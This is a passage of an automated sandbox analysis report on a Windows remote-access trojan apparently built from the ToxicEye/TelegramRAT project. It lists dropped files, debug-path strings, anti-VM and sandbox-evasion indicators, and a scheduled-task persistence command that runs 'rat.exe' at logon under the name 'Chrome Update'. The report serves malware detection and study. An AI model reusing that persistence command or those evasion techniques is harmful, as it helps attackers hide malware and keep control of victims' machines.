                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"Jump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /NobreakJump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\ToxicEye\rat.exe "rat.exe" Jump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exeJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 2960"
                                        Source: Window RecorderWindow detected: More than 3 window changes detected
                                        Source: C:\Users\ToxicEye\rat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                        Source: dAIJ6g47mZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                        Source: dAIJ6g47mZ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Source: dAIJ6g47mZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                        Source: Binary string: System.Xml.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: TelegramRAT.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: rat.exe, 0000000A.00000002.2170409712.0000023F1DD34000.00000004.00000800.00020000.00000000.sdmp
                                        Source: Binary string: System.Windows.Forms.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Drawing.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Configuration.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Configuration.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: \??\C:\Windows\System.pdb source: rat.exe, 0000000A.00000002.2171890625.0000023F36965000.00000004.00000020.00020000.00000000.sdmp
                                        Source: Binary string: System.Drawing.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Core.pdbH source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Xml.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.pdb source: rat.exe, 0000000A.00000002.2170409712.0000023F1DD34000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2171890625.0000023F3697B000.00000004.00000020.00020000.00000000.sdmp, WER284.tmp.dmp.18.dr
                                        Source: Binary string: C:\Users\Gerrard\Downloads\ToxicEye-master\ToxicEye-master\TelegramRAT\TelegramRAT\obj\Release\TelegramRAT.pdb+ source: dAIJ6g47mZ.exe, rat.exe.0.dr
                                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Core.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Windows.Forms.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: mscorlib.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.pdbH source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Management.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Drawing.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: rat.exe, 0000000A.00000002.2171890625.0000023F36940000.00000004.00000020.00020000.00000000.sdmp
                                        Source: Binary string: mscorlib.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Management.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: C:\Users\Gerrard\Downloads\ToxicEye-master\ToxicEye-master\TelegramRAT\TelegramRAT\obj\Release\TelegramRAT.pdb source: dAIJ6g47mZ.exe, rat.exe.0.dr
                                        Source: Binary string: System.Core.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Windows.Forms.pdbIL_STUB_PInvoke source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Xml.pdbE source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Core.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
                                        Source: dAIJ6g47mZ.exeStatic PE information: 0xCB7FC332 [Thu Mar 10 14:24:50 2078 UTC]
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeCode function: 0_2_00007FFD348A322D push eax; retf 0_2_00007FFD348A3419
                                        Source: C:\Users\ToxicEye\rat.exeCode function: 10_2_00007FFD348889E8 push E85CC07Ch; ret 10_2_00007FFD348889F9
                                        Source: C:\Users\ToxicEye\rat.exeCode function: 10_2_00007FFD34883403 push eax; retf 10_2_00007FFD34883419
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeFile created: C:\Users\ToxicEye\rat.exeJump to dropped file
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeFile created: C:\Users\ToxicEye\rat.exeJump to dropped file

                                        Boot Survival

                                        barindex
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeFile created: C:\Users\ToxicEye\rat.exeJump to dropped file
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                                        Malware Analysis System Evasion

                                        barindex
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\ToxicEye\rat.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drBinary or memory string: SBIEDLL.DLL
                                        Source: C:\Users\ToxicEye\rat.exeCode function: 10_2_00007FFD348811F7 sldt word ptr [eax]10_2_00007FFD348811F7
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe TID: 6600Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exe TID: 6804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                        Source: C:\Users\ToxicEye\rat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: Amcache.hve.18.drBinary or memory string: VMware
                                        Source: Amcache.hve.18.drBinary or memory string: VMware Virtual USB Mouse
                                        Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin
                                        Source: Amcache.hve.18.drBinary or memory string: VMware, Inc.
                                        Source: Amcache.hve.18.drBinary or memory string: VMware20,1hbin@
                                        Source: Amcache.hve.18.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                        Source: Amcache.hve.18.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                        Source: Amcache.hve.18.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                        Source: Amcache.hve.18.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                                        Source: rat.exe, 0000000A.00000002.2170080908.0000023F1DAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
                                        Source: Amcache.hve.18.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                        Source: Amcache.hve.18.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                        Source: Amcache.hve.18.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                        Source: Amcache.hve.18.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                        Source: Amcache.hve.18.drBinary or memory string: vmci.sys
                                        Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin`
                                        Source: rat.exe.0.drBinary or memory string: vmware
                                        Source: Amcache.hve.18.drBinary or memory string: \driver\vmci,\driver\pci
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drBinary or memory string: PreventStartOnVirtualMachine
                                        Source: Amcache.hve.18.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                        Source: Amcache.hve.18.drBinary or memory string: VMware20,1
                                        Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                        Source: Amcache.hve.18.drBinary or memory string: NECVMWar VMware SATA CD00
                                        Source: Amcache.hve.18.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                        Source: Amcache.hve.18.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                        Source: Amcache.hve.18.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                        Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                        Source: Amcache.hve.18.drBinary or memory string: VMware PCI VMCI Bus Device
                                        Source: Amcache.hve.18.drBinary or memory string: VMware VMCI Bus Device
